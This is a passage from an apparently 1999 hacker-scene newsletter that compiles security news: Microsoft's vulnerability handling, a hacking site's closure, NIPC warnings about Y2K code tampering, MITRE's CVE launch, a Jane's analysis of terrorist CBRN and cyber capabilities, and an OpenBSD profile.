reports Microsoft gets turn out to be bonafide security vulnerabilities, according to Culp. Many end up being problems due to unclear documentation, incorrect implementations of the software or code, or users not following best practices, he said. In recent swift work, Microsoft released a security bulletin just hours after an IE vulnerability was announced September 10, telling users how to protect against it while a patch is developed, Culp noted. Meanwhile, Microsoft has taken a new approach and put a Windows 2000 test server online for users to try to hack. The system has held up although it got off to a rocky start and was down for several days after lightning hit a router right after it was put online. Cooper of NTBugtraq predicted that the security situation will improve for Microsoft as consumers become more savvy and demand more security in products. "Certainly there's been a change in Microsoft in the last two years to do things with far more security in mind," he said. "The reality is they're doing it to an extent that consumers will tolerate and to an extent that consumers will demand." Users are content Several users said they have no complaints with Microsoft's products or attitude. "From my perspective, what Microsoft is doing is right on target," said Greg Scott, IS manager at Oregon State University's College of Business in Corvalis. "I want the interoperability the tools provide me so I can move things cleanly, simply and easily between systems. And I'm willing to suffer the minor inconvenience of having to pay more attention to security and patches," he said. "As long as they provide patches and fixes in an appropriate timeframe, then I'll use their products." Another user said he likes Microsoft software specifically because of its integration. Ty Simone, IS manager at Onsite Sycom Energy Corp., an energy service company based in Carlsbad, California, said he's not bothered by Microsoft's usability versus security tradeoff. "I would much rather have the control here than have Microsoft saying 'You can't do anything until you change something,'" he said. "For example, the default for IE is medium. If they set it to high, until I get to that user and set it to medium that user couldn't access the corporate intranet, much less the Internet." Simone also praised Microsoft for reacting swiftly and forthrightly when issues arise, noting that Unix users don't get security bulletins e-mailed to them like Windows users do. Unix gets more hacks but less press than NT does, Simone says, adding that "It's not popular to bash the little guy." Unix, Linux, MacOS So how do the Windows alternatives fare? The MacOSX "add-on programs look to be just as vulnerable (as Windows) -- there are permissions problems and plenty of coding issues," Dr. Mudge of Boston-based hacker group L0pht Heavy Industries wrote in an e-mail. "However, a quick look would imply that the core OS might be much more secure than NT's core components. This is most likely due to the fact that the new MacOS's are really BSD 4.4 (Unix) and mach memory systems. Both have been around for decades to have the kinks worked out of." Meanwhile, open source operating systems tend to be more easily secured than closed source ones like NT, "because there are more people doing more work to find the holes, and it's easier for researchers to develop patches for exploits they find," hacker Tweety Fish said. The most secure platform "out-of-the-box" is OpenBSD because security is a focus on the project, he said. "It is not perfect; no OS is, but with OpenBSD you can guarantee that security is their first priority." The favored underdog, Linux, is considered experimental at this point, but it may end up giving NT a good run for its money, according to Winn Schwartau, founder of Security Experts consultancy in St. Petersburg, Florida, and author of "Information Warfare" and other books. Most of his clients, who include governments, NATO and other multinational organizations, use Unix now, he added. Despite the complaints about the security in Microsoft software, Culp said customers-including government agencies and organizations in the healthcare, insurance and banking industries-feel comfortable using the company's products. And Cooper of NT Bugtraq noted that Windows is "hugely accepted, widely deployed and largely liked" by users. "I don't think Windows is more or less secure than some other operating system," Cooper said. "I think that there are technologies from Microsoft that are good; there are others that are not good; and there are others that still need to be refined and improved, but that are still very much in demand." But hacker Space Rogue, a member of the L0pht Heavy Industries, summed up what he and others see as Microsoft's security challenges. "Windows has three strikes against it, as I see it. Popular OS, weak security, easy-to-use, oh, and it is made by MS, the company everyone loves to hate." @HWA 29.0 Darktide Hacking Is Closed ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Outkast After almost 2 years Darktide Hacking has closed its doors. The site offered underground news, newbie help guides, Linux documentation and more. They will be missed. Outkast, the sites web master, hopes to open a new site with a different focus soon. Darktide Hacking http://www.darktide.com From the site; The time has come for me to close down Darktide as we know it. Darktide was a blast to run, but the time has come for me and my crew to start making a income on the Internet. I need to have a real income, just like all you. I could have made money with Darktide , but I will not sell-out. I will not turn Darktide into the next AntiOnline Network. I don't want to make money off of hacking, I have to much respect for you, the hackers, for the underground. Darktide will be turning into a netcenter. Access to (but not limited to) many search engines, free web-based E-mail, news, and documentation. We will still have information on Linux, encryption, and programming (and more). We will still have everything that is on Darktide.Com right now (but not limited to), minus the text files on hacking. You have my word. We will continue to open the doors to information. You, the hackers, made me. Without you, there would be no Darktide Hacking. I owe it all to you. I just want you all to know that I will never forget the underground, and never leave the underground behind. I hope to still see a link to Darktide on your pages, and I hope that you will not forget about me and my crew. What is money? Money is the root of all evil. We must handle it with care, or we will be the next AntiOnline. What is life? Live is like a big obstacle. Every time you think your problems might be gone, they will come right back at you. I hope that you all will make hacking your problemless life whenever you can. I know I will, till my life ends. I will miss it, -Outkast (Founder of Darktide, Inc.) More Information: Closing time: Closed. New site opening time: Date not known yet. We will post the opening date when we have one. Contact We have been getting alot of questions sent to our contact@darktide.com E-mail box. Because Darktide will soon be moving to a diffrent server, that E-mail address might be down for a few days in this upcoming week so we would like you to send questions to another address. If you would like to contact us please use this E-mail address. darktide@interaccess.com Or you can send us mail at: Darktide P.O. Box 465 Lake Forest, IL 60045 @HWA 30.0 NIPC Head Warns of Y2K Bug Fixes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mmullin3 Michael Vatis, who heads the interagency National Infrastructure Protection Center, has said that they have found indications that malicious code was being installed at the same time as Y2K fixes. The finger was pointed at fixes done by programmers from India and Israel as well as Ireland, Pakistan and the Philippines. Exactly what indications where found is not made clear. It would seem that the severity of this problem isn't really known and that a lot of people just seem to be guessing. MSNBC http://www.msnbc.com/news/317848.asp Cyber cop warns of Y2K tampering Evidence seen that contractors are making malicious changes under the guise of Year 2000 repairs REUTERS WASHINGTON, Sept. 30 — Malicious changes to computer code under the guise of Year 2000 software fixes has begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cyber cop said on Thursday “WE HAVE SOME INDICATIONS that this is happening” in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters. Vatis heads the interagency National Infrastructure Protection Center (NPIC), responsible for detecting and deterring cyber attacks on networks that drive U.S. finance, transport, telecommunications and other vital sectors. A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the “most likely sources of malicious remediation” of U.S. software. “India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity and means,” the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest. Beware the millennium bug repair Significant amounts of Y2K repair is also being done for U.S. companies by contractors in Ireland, Pakistan and the Philippines, according to Maynard. But they appear among the “least likely” providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote. Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the Y2K glitch, which could scramble computers starting Jan. 1 when 1999 gives way to 2000. The CIA declined comment on Maynard’s article. Referring to it, Vatis said: “This is our effort to put out in the public information that hopefully can be useful to people.” Vatis, interviewed in his 11th floor office at FBI headquarters, said that so far “not a great deal” of Y2K-related tampering had turned up. “But that’s largely because, number one, we’re really dependent on private companies to tell us if they’re seeing malicious code being implanted in their systems,” he said. In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners. “A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States,” Vatis said. He said it was “quite easy” for an outsider to code in ways of gaining future access or causing something to ”detonate” down the road. This could expose a company to future “denial of service attacks,” open it to economic espionage or leave it vulnerable to malicious altering of data, Vatis said. The Special Senate Y2K committee, in its final report last week, described the issue as an “unsettling.” “The effort to fix the code may well introduce serious long-term risks to the nation’s security and information superiority,” said the panel headed by Robert Bennett, Republican of Utah, and Chris Dodd, Democrat of Connecticut. The panel said the long-term consequences could include: Increased foreign intelligence collection Increase espionage activity Reduced information security Loss of economic advantage Increase in infrastructure vulnerability Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing “trap doors” for anonymous access. By implanting malicious code, he said, a contractor could stitch in a “logic bomb” or a time-delayed virus that would later disrupt operations. Another threat was insertion of a program that would compromise passwords or other system security, he said. © 1999 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content is expressly prohibited without the prior written consent of Reuters. @HWA 31.0 Better Computer Security Needs More Than Just Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid In testimony before a Congressional Committee yesterday federal and industry experts said that while enhancements to twelve year old Computer Security Act are needed laws alone are not going to fix underlying security issues on the internet. Increasing the role of the National Institute of Standards and Technology to establish security guidelines for federal agencies would be one of the goals of the Computer Security Enhancement Act of 1999. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0927/web-security-9-30-99.html SEPTEMBER 30, 1999 . . . 17:18 EDT Law is only part of better computer security, Congress told BY DIANE FRANK (diane_frank@fcw.com) Federal agencies would benefit greatly from a proposed enhancement to a 12-year-old computer security law, but legislation alone cannot solve some underlying information security problems, federal and industry experts told Congress today. The Computer Security Enhancement Act of 1999 would increase the role and resources of the National Institute of Standards and Technology by establishing security guidelines that federal agencies could follow. The bill would beef up the Computer Security Act, which requires civilian agencies to protect computer systems. The Computer Security Enhancement Act passed the House last year but failed to move in the Senate. The bill will not necessarily make federal computers safer, said Raymond Kammer, director of NIST. Agencies must understand that the responsibility for securing computers and transactions starts with agencies and that they must put in place steps to meet those demands, he said. "Only they can decide how valuable the data is and then how to protect it," Kammer said. The act also would provide additional resources to NIST for funding security scholarships and internships for students, part of a solution to the growing shortage of security professionals within government and industry. "You can't help [ease] this [IT worker shortage] by bringing in immigrants," said Harris Miller, president of the Information Technology Association of America. "You can't outsource this to another country. We need to have specialists in this country." @HWA 32.0 New NT Security List Started ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond A new mailing list devoted to NT Security that promises to be completely full disclosure has been started. The new list, NT Security Advice, will be moderated by Steve Manzuik and is open to to anyone interested in, or working with Microsoft Windows NT and Security. TO SUBSCRIBE: Send an email to maillist@ntsecadvice.com @HWA 33.0 Computer Security Dictionary Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne MITRE Corporation has recently unveiled the first Public Dictionary of Computer Vulnerabilities, "in order to boost cyber-defense". "Common Vulnerabilities and Exposures [CVE]" contains standardized names and descriptions of more than 300 known security vulnerabilities and exposures, enabling sharing of data among various vulnerability databases and security tools easier. Computer World http://www.computerworld.com/home/news.nsf/all/9909293cved Mitre unveils security 'dictionary' By Kathleen Ohlson In an effort to find common ground for different vulnerability databases and security tools, the Mitre Corp. today rolled out its Common Vulnerabilities and Exposures (CVE) effort. The CVE is a public dictionary that consists of standard names and descriptions for more than 300 security vulnerabilities and exposures. Common names will allow data to cross separate databases and tools, officials said. Based in Bedford, Mass., Mitre is an independent, nonprofit company offering technical support to the government. It developed the list with 19 security organizations, including Cisco Systems Inc., Internet Security Systems and the CERT Coordination Center at Carnegie Mellon University, that make up the CVE Editorial Board. Related story: Mitre to announce security 'dictionary', Sept. 28, 1999 http://www.computerworld.com/home/news.nsf/all/9909282mitre @HWA 34.0 CyberWarfare - Real or Imagined? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Lady Sharrow An interesting article from the free section of Janes Intelligence Monthly. This is a quite long article but it covers the use of Hi-Tech weapons by terrorist organizations. Most of the article is concerned with 'conventional weapons' i.e. chemical, biological, nuclear etc but the basic assumptions are also applied to cyber warfare. This is talking about 'serious' use of these weapons rather than the average web page defacement. Janes Intelligence Monthly http://jir.janes.com/sample/jir0499.html Document created: 21 SEPTEMBER 1999 Cyberwarfare: fact or fiction? Now that cyberwarfare has become an accepted fact, Joshua Sinai examines the requirements for anti-state groups to employ this and chemical, biological, radiological and nuclear weaponry. As the 21st century approaches, there is great concern in worldwide national security circles about preparations by terrorist groups, either on their own or jointly with state sponsors, to exploit the increasing availability of sophisticated lethal technologies to launch mass destruction and mass disruption warfare against their enemies' populations and critical infrastructures. Mass destruction warfare utilises chemical, biological, radiological and nuclear (CBRN) weaponry, whereas cyber terrorism utilizes information technology (IT) devices to inflict mass disruption of an opponent's critical IT infrastructure. The concern about the likelihood of CBRN/Cyber terrorist attacks is driven by the emergence of new types of terrorist groups which possess the motivation and technical capability to launch such attacks, and particularly a power drive by their leaders to propel their groups on the international arena as a first order of magnitude technological destroyer and menace. Only a select number of terrorist groups and few state sponsors are likely to possess the necessary motivation and capability in the spheres of organisation, funding, acquisition, technology, storage and stockpiling, logistics, and other overt and covert resources to be able to make the transition from conventional to CBRN/Cyber warfare. For many, the numerous internal and external tasks and hurdles involved in acquiring, storing and deploying such sophisticated weaponry and devices are simply too much. Moreover, few terrorist groups and state sponsors are sufficiently motivated to carry out mass casualty or mass disruption warfare. For many, small scale conventional attacks such as car or truck bombings cause sufficient death and destruction to achieve the objective of terrorising a targeted population and its government in order to compel them to pay attention or make concessions to an insurgent's cause and grievances. Nevertheless, there is sufficient reporting of activities by terrorist groups and their state sponsors in the CBRN/Cyber realm to provide the necessary indications and warning (I&W) indicators to usher in a new paradigm of super, ultra, and macro-type catastrophic terrorism. For terrorists, CBRN/Cyber weapons provide the opportunity to cause death and disruption at unprecedented levels - resulting in thousands of casualties and billions of dollars in damages to critical infrastructure nodes. However, depending on the levels of sophisticated technologies deployed, acquiring a CBRN/Cyber capability requires extensive funding, an overt or covert acquisition capability, a technological research and development program to produce, weaponise and stockpile CBRN materiel (or the capability to purchase or steal ready-made weapons), and a level of technical expertise and logistical infrastructure that is appropriate to launch successful CBRN attacks. This is beyond the technical capability or motivation of most terrorist groups. On the other hand, the information revolution ushered in by the Internet allows terrorists to access articles and documents from the World Wide Web about the manufacture or acquisition of BW or CW agents, and commercial-off-the-shelf (COTS) software products can easily be obtained to conduct cyberterrorism, making CB/Cyber attacks much more feasible to launch than hitherto. Radiological and nuclear weapons, however, are far more difficult for terrorist groups to acquire or to develop indigenously, to weaponise and deploy, or to provide storage for. Although such cost/benefit considerations may limit the majority of terrorist operations to the realm of conventional warfare in the 21st century, recent WMD- related events and reports indicate increasing activity by certain terrorist groups and state sponsors in the CBRN/Cyber arena. This has been accompanied by a lowering of the threshold for their conviction that conventional attacks are insufficiently effective and that a more lethal form of mass casualty or mass disruption violence is required to achieve their goals. Thus, the primary differences between conventional and CBRN/Cyber terrorism lie in the areas of motivation, organisation, funding, and capability in the realms of acquisition, technology, and logistics. There is also the issue of the capability to overcome external hurdles. These include acquisition of the necessary technologies, cooperation by foreign suppliers, creation of a logistics network for acquisition and deployment, obtaining state sponsorship, and also detection, penetration, and deterrence by foreign intelligence and counterterrorism agencies. There have already been several instances of CBRN/Cyber operations by terrorist groups. Chemical attacks have been mounted by the Aum Shinrikyo cult, such as the March 1995 sarin nerve gas attack on the Tokyo subway system, killing 12 people and injuring 5,500. Chemical cyanide was included with explosives in the February 1993 bombing attack by Islamic militants of the World Trade Center. In the mid-1980s, the Tamil secessionist group, LTTE (which provides its operatives with a cyanide pill in the event of capture) threatened to carry out a BW attack by spreading pathogens to infect humans and crops in Sri Lanka. Aum Shinrikyo also attempted, albeit unsuccessfully, on at least 10 occasions to disperse biological warfare agents in aerosol form, and in October 1992 its members attempted to acquire Ebola virus samples in then Zaire for future use in biological attacks. In mid-1997, an American white supremacist faction plotted to attack the New York City subway system with biological weapons. Reportedly, Hizbullah and Hamas operatives have acquired chemical and biological components, although they have so far refrained from carrying out such attacks. Until its top leaders were arrested, some members of the Aum group also studied uranium enrichment and laser technology which are necessary for acquiring the capability to develop nuclear weapons. The group had one or possibly more of its followers on the staff of the Russian Kurchatov Institute's nuclear physics laboratory. In September 1998, Mamdouh Mahmud Salim, a top aide to Osama Bin Laden was arrested in Munich while trying to procure enriched uranium for developing nuclear weapons. One of the first known instances of cyberterrorism occurred in 1997 when the LTTE launched cyber attacks against Sri Lankan government sites, including hacking into a government web site and altering it to transmit their own political propaganda. Supporters of the Mexican Zapatista rebels have jammed Mexican government web sites. The American terrorist group, the Christian Patriot movement, is active in the Internet.??? The Osama Bin Laden group utilises an extensive network of computers, disks for data storage, and Internet for e-mail and electronic bulletin boards to exchange information. Hamas operatives in the Middle East and elsewhere use Internet chat rooms and e-mail to coordinate activities and plan operations. Other Middle Eastern terrorist groups, such as Lebanon's Hizbullah and Algeria's Armed Islamic Group, also utilise computers and the Internet for communications and propaganda. Terrorists have also targeted critical infrastructure. Thus, for example, in the Summer of 1998, the LTTE bombed state-owned and private telecommunications facilities in Sri Lanka, damaging buildings and disrupting telephone service. Motivation Motivation concerns the psychological, political and strategic factors that are likely to serve as incentives or disincentives for terrorist groups to resort to CBRN/Cyber warfare, particularly the decision to embark on a higher lethality and disruption in targeting. Motivations are an important factor because they influence a group's destructive or disruptive potential and the paths and links that they are likely to pursue to acquire the necessary technological and operational capabilities to launch CBRN/Cyber attacks. It is important to assess these motivations because a misunderstanding of a terrorist group's decision making regarding CBRN/Cyber warfare could lead to underestimating or overestimating a group's CBRN/Cyber capability, surprises about unanticipated attacks, the types of weapons chosen, the timeframe for such attacks, and likely targets. The psychological factors that are likely to drive terrorist groups to embark on CBRN/Cyber warfare might be irrationally or rationally based. Thus, irrational factors might be characterised as leadership by extremist, paranoid or criminally insane border-line personalities, who are driven by a suicidal 'culture of death'. On the other hand, rationally-based factors would include a need for the great prestige and power that such weapons would provide or the pursuit of mass-casualty type vengeance against particularly repressive government policies or excessively harsh government retaliation. Both types of psychological actors tend to be authoritarian, and, although the latter type might behave like rational actors, both types reject commonly accepted societal norms, standards or proportions that would make them less inclined to exceed a certain violence and mass casualty threshold, and thus they would be more prone to commit catastrophic violence and disruption. The political factors that would motivate terrorist groups to resort to catastrophic warfare range from particular to broad grievances against a perceived enemy state, sub-state actors or transnational organisations, and their objectives vary from revolution, secession for a religious, ethnic or national community, to nihilism and the complete destruction of a state. A second set of political factors that are particularly susceptible to a lack of conventional constraints on catastrophic violence are religious beliefs that advocate visions of apocalyptic millennialism, messianic apocalypse or redemptiveness, in which CBRN/Cyber type violence is employed to hasten in a new millenium, the arrival of a messiah, or a new order. This is particularly the case with messianic groups such as Aum Shinrikyo which view the society that they seek to destroy as inherently worthless and offer their adherents a path to a higher existence through rebirth in the next life. A third set of political factors includes virulent racist or ethnic hatreds by terrorist groups resolution of which they believe would be achieved by the destruction or annihilation of the enemy community. Strategy vis-à-vis CBRN/Cyber warfare concerns how a terrorist group's leadership defines its broad objectives and the means and targets necessary for their attainment. For example, a terrorist group that is inclined towards a strategy of minimising risk or failure, of using violence to influence, but not destroy an opponent, is concerned about backlash within its own community or intended audience, and fears massive military retaliation by a foreign state against its own group and supporting community, might be more likely to adopt tactics that call for conventional warfare, whereas a group whose strategy is unconstrained by these factors might be more likely to pursue the CBRN/Cyber catastrophic option. Thus, an extremist religious terrorist group that regards violence as a sacramental act or divine duty, and the constituency of which is limited to its own group, would likely be unconstrained to employ the most lethal violent means at its disposal. A further strategic objective might be to carry out or threaten to carry out a CBRN/Cyber attack in order to perpetrate an economic extortion or to massively damage a critical infrastructure node, such as a food supply. Another strategic consideration concerns the decision whether or not to seek state sponsorship and assistance in CBRN/Cyber warfare. A final consideration is whether the group needs to claim credit for a CBRN/Cyber attack. In fact, the reduced need to claim credit for such attacks signals the emergence of the "silent terrorists," and is another factor contributing to loosening self-imposed constraints against higher levels of lethality. Organization There are no fixed organisational prerequisites for attaining CBRN/Cyber capability, particularly in the age of the Internet when terrorist operatives can be dispersed geographically yet are able to communicate with each other by using their own secured communications networks. At one end of the organisational spectrum, the technological complexities involved in acquiring CBRN/Cyber capability require a well organised, hierarchical organisation, with a command and control apparatus staffed by professional terrorists, a highly- developed R&D apparatus staffed by scientists and technicians, production and storage facilities, a transnational logistics network to clandestinely acquire the necessary technology from external sources, and business activities (either legitimate or illegitimate) to generate the necessary income to fund the acquisition of CBRN/Cyber operational capability. At the other end of the organisational spectrum, a CBRN/Cyber operational capability might be acquired by a terrorist entity of a transitory, ad hoc amalgamation that bands together for a single mission, that is less cohesive and more diffuse organizationally, and is staffed by a small number of professional operatives and amateur associates. In addition, such groups, such as the Osama Bin Laden network, do not generally operate out of geographically bound sanctuaries or safe-havens and their activities are not confined to specific operational areas, but are dispersed worldwide. The use of amateurs by professional terrorists is significant because these can be used as pawns, cut- outs or expendable minions to conceal the identity of the particular organisation or state sponsor that actually orders or commissions a CBRN/Cyber attack. In such a case, CBRN/Cyber warfare would be carried out by an organizationally ad hoc terrorist entity, backed by a state sponsor, that joins forces for a specific one-time operation. A related organisational issue is the degree of technical and military professionalization required by terrorist groups to conduct CBRN/Cyber warfare, or whether amateurs can develop such capability, particularly when aided by a state sponsor. Thus, to pursue the CBRN/Cyber warfare option, do terrorist groups need to recruit individuals with technical degrees and expertise in disciplines such as chemistry, biology, physics, engineering and computer science? Moreover, does a group need to organise the training on its own or is a state sponsor required to provide instruction and facilities? A terrorist group might also train its members in not just a single weapon but a variety of CBRN/Cyber weapons for which different sets and levels of technological expertise are required in order to attain operational capability in each of these weapons. Thus, for example, terrorist groups, such as Aum Shinrikyo, have provided their members with extensive training and education in a variety of CBRN/Cyber weapons, including studying uranium enrichment and laser technology, with at least one of their members working on the staff of a Russian nuclear physics laboratory, while another contingent traveled to Africa to study the Ebola virus. Cyberwarfare involves a different set of training requirements that is also more readily available. Thus, training in computer science is now widely prevalent among terrorist groups. Funding Significant financial resources are required for terrorist groups to develop an indigenous CBRN/Cyber operational capability unless a group succeeds in weaponising a crude, low-technology device, or stealing or hijacking such a device. In general, a range of costs are involved in acquiring, operationalizing, stockpiling and deploying CBRN/Cyber weapons of varying levels of sophistication and lethality. As a result, financial considerations play a role in deciding whether a group will choose single or multiple CBRN/Cyber weapons, the types of dispersal systems, and whether these weapons will be indigenously developed, obtained from an external source (whether legally or through smuggling, hijacking or theft), or are provided by a state sponsor. CBRN/Cyber weapons for use in terrorist attacks vary greatly in their cost. For example, acquiring production and operational capability to deploy chemical, biological, radiological, or cyber capability involves relatively small financial resources, and are within the means of many terrorist groups. Far more significant financial resources, which only a few groups possess, are necessary to acquire a nuclear weapons capability. Nevertheless, some terrorist groups, such as the Aum Shinrikyo in its heyday, the Bin Laden network, or Colombian narco-traffickers, could, potentially, acquire a miniaturized nuclear weapon because of the vast financial resources accruing from their multiplicity of legitimate and criminal business enterprises. To launch a cyber attack, a terrorist group could purchase relatively inexpensive commercial-off-the-shelf (COTS) software and hardware, with some weapons of mass disruption software available on hacker bulletin boards and Web sites. State Sponsors Obtaining the sponsorship of a state with WMD resources can be a major facilitator in transitioning to CBRN/Cyber terrorism. There are a number of motivations, requirements, and bureaucratic considerations involved in the relationship between terrorist groups and potential state sponsors regarding the resort to CBRN/Cyber warfare. However, obtaining the support of a state sponsor is not automatic or inevitable. Potential state sponsors would have to weigh the costs and benefits involved in sponsoring CBRN/Cyber operations by terrorist groups, including providing assistance in the phases of research, development, production, and operations planning. Other issues concern the conditions and arrangements for providing the terrorist group with CBRN/Cyber weapons, training, logistics, diplomatic cover and deniability. Thus, a number of cost/benefit factors are involved in the relations between state sponsors and surrogate terrorist groups. For both there are advantages and disadvantages. For terrorist groups state sponsorship can provide assistance in terms of funding, intelligence, CBRN/Cyber weaponry, technical expertise, training, laboratories, logistics, target reconnaissance and surveillance, escape assistance and safe haven, diplomatic cover, and deniability. Thus, for example, attaining the support of a state sponsor with nuclear capability (such as Iran, Iraq, Pakistan or North Korea) would shortcut the process of fabricating a high-grade nuclear bomb with weapons-grade material, which would be extremely difficult, although not impossible, for most terrorist groups to develop on their own. Such a nuclear weapon, however, would likely be miniaturised and of a tactical, not a strategic variety. State support need not be explicit or direct. Thus, a state sponsor might indirectly influence or remotely control a terrorist group's actions. A state sponsor might use amateur terrorists as dupes or cut-outs to conceal their involvement, and thus avoid the possibility of retaliation. External Hurdles There are a number of external hurdles that terrorist groups must overcome in order to acquire operational CBRN/Cyber capability. These hurdles include technological and logistical factors, obtaining state sponsorship and deterrence by foreign intelligence and counterterrorism agencies. In terms of technological hurdles, CBRN weapons and Cyber devices vary in the levels of technological sophistication required for their development, weaponization and deployment. There is also a clear distinction between CBRN weapons and Cyber devices. Cyberterror devices involve high end technologies, although of a different magnitude than CBRN weapons, because, among other factors, the means required to access and achieve the massive destruction or breakdown of a critical infrastructural information technology (IT)-type target involve entirely different kinds of delivery systems (eg computers). CBRN weapons are generally at the high end of the technological spectrum, although within this high end range there are gradations of technological sophistication that terrorists are likely to utilise because of the variances in their own operational capabilities. In general, the ranking of CBRN weapons involves consideration of the levels of technological sophistication required to develop a particular CBRN weapon and the potential weapon effects. Thus, if potential weapon effects are being ranked, chemical devices would be placed at the low end with tactical nuclear and biological weapons at the high end. On the other hand, in terms of levels of sophistication required to develop CBRN weapons, the ranking would begin with the lower end chemical and biological to the higher end radiological and nuclear. The reason for this ranking is the relative ease with which it is possible to construct crude chemical and biological devices. Weapons grade biological agents from a producer-country such as Russia are also particularly vulnerable to theft or smuggling. Radiological and tactical nuclear weapons are harder to develop, although crude approximations of them are feasible for some terrorist groups. Among CBRN weapons, the most substantial hurdles lie in the fabrication and deployment of nuclear weapons. There are enormous technological tasks involved in acquiring and utilising weapons grade materials, such as highly enriched uranium or plutonium, to produce nuclear explosives. Other than the hurdle of indigenously producing a nuclear device, terrorist groups would have either to purchase such a device from external sources, to obtain it from a state sponsor, or to steal or smuggle it. Tactical nuclear weapons, as opposed to strategic nuclear weapons, are most vulnerable to theft or illegal purchase by terrorist groups because of their relatively small size, widespread dispersal, and the absence among older generations of these weapons of effective electronic locks or Permissive Action Links (PALs) to prevent their unauthorized use. There are also complex technical requirements involved in deploying a nuclear explosive device, particularly in dispersing radioactive material. In all these cases of CBRN weapons, it may not be necessary for terrorist groups to acquire actual battlefield weapons-certain crude devices or delivery and dispersal systems may not achieve mass destruction effects, but might be sufficient to inflict mass terror. The logistics hurdle involves the capability by terrorist groups to create an organizational apparatus and transnational network not only to acquire the technology to produce CBRN/Cyber weapons and devices, but to conduct target reconnaissance and surveillance, and then to transport, deliver, disperse and disseminate the weapon against the intended target and, if possible, carry out an escape. Obtaining state support represents another external hurdle. A state sponsor might be reluctant to collaborate with a terrorist group in the CBRN/Cyber warfare realm because of the enormous political costs and risks of retaliation and exposure. Moreover, there is always the possibility that a terrorist group might prove unreliable or inefficient, or, in a worst case scenario, use CBRN/ Cyber weapons against their sponsor. On the other hand, there are certain factors, conditions and circumstances that are likely to facilitate cooperation and joint ventures between state sponsors and terrorist groups. Thus, for example, using a surrogate group could enable a state sponsor to achieve certain strategic objectives while denying its role in such an attack. Several trends and developments are creating a new dynamic in the relationship between state sponsors and terrorist groups. In certain CBRN/Cyber areas, terrorist groups are less dependent on state sponsors because of widespread access to the Internet and other resources that make it relatively easy for terrorist groups to learn how to develop chemical or biological agents indigenously. Similarly, in terms of cyberwarfare, terrorist groups may have little need for state sponsors because much of the applicable software and hardware are available commercially and targeting can be accomplished from a computer terminal hundreds of miles away from the intended targets. Terrorist groups are extremely vulnerable to deterrence by foreign intelligence and counterterrorism agencies. Thus, terrorist groups must overcome the continual possibility of their activities and operations being detected, monitored, penetrated and potentially preempted, interdicted or destroyed by these agencies. Conclusion CBRN/Cyber terrorist warfare is likely to pose a significant threat in the 21st century as a result of the confluence of motivation, technical capabilities, and involvement by state sponsors. This analysis is intended to highlight some of the internal and external factors, requirements and hurdles that need to be considered in assessing a terrorist group's current and future development status and operational capability to conduct CBRN/Cyber warfare. Correlating these internal and external factors and hurdles would make it possible to forecast which terrorist groups and state sponsors are likely to embark on CBRN/ Cyber warfare, the types of adaptations and changes they would require to transition to such warfare, the types of weapons and targeting they are likely to pursue (including the possible resort to single or multiple CBRN/Cyber weapons and devices), the timelines for such attacks, and vulnerabilities that could be exploited by foreign intelligence and counterterrorism agencies to constrain terrorist groups--and, when applicable, state sponsors--from embarking on such warfare. @HWA 35.0 Theo de Raadt and OpenBSD Profiled ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Calgary Herald has published a profile of Theo de Raadt and arguably the most secure out of the box operating system there is, OpenBSD. Calgary Herald http://www.calgaryherald.com/business/technology/stories/990930/2929913.html Calgarian heads team ensuring OpenBSD security Theo de Raadt oversees hundreds of volunteer programmers Matthew McClearn, Calgary Herald With nearly two dozen computers scattered throughout his Ramsay district home, Theo de Raadt is well equipped to lead an international software project. De Raadt has been working for three years on OpenBSD, a variant of the Unix operating system. Unix, favoured by academics, researchers and systems administrators for its power and flexibility, is the foundation for many popular operating systems, including Sun, Solaris and Linux. What Linus Torvalds is to the increasingly popular Linux, de Raadt is to OpenBSD. He oversees hundreds of volunteer programmers who pore over OpenBSD's code trying to make it better, for little more than glory and the satisfaction of making software better. Unlike any other operating system, OpenBSD is engineered from the ground up with security in mind. "It's just a really cool process to be involved with," he says. "In two and a half years, we haven't found a vulnerability. That means in the first six months, we managed to get rid of them all." That's in stark contrast to other operating systems, most notably Microsoft's ubiquitous Windows platform. Windows security flaws are discovered on a weekly basis. In the early days of Unix, the University of California at Berkeley wanted to create its own strengthened version. Academics developed Net2, and attained a Berkeley Software Distribution (BSD) licence for it -- meaning, in short, that developers can modify it and users can install it freely at no cost. The university eventually abandoned Net2 because of legal difficulties, but by then it had developed a considerable following. It spun off FreeBSD and NetBSD, two free operating systems. De Raadt was a founder of the NetBSD and worked on it for three years before splitting off following a bitter dispute. In 1996, his computer was cracked by a friend. After hacking into each other's systems several times, the two began reviewing BSD's 350 megabytes of code looking for security holes. The task proved daunting. The harder they looked, the more problems they discovered. More and more people pored over the body of code, corrected problems and submitted the improvements to de Raadt and his inner circle. That code became OpenBSD. Three years later, de Raadt is still doing it. So far, he has spent $76,000 of his own money and dedicated many long days. A new version of OpenBSD comes out every six months. It can be downloaded for free at www.openbsd.org or purchased on CD-ROM for $30 US. "I was eating Ichiban and Kraft Dinner because I was too poor to feed myself," he recalls. "Then we started selling CDs, and now things are OK." OpenBSD is sold to the world from Calgary. Louis 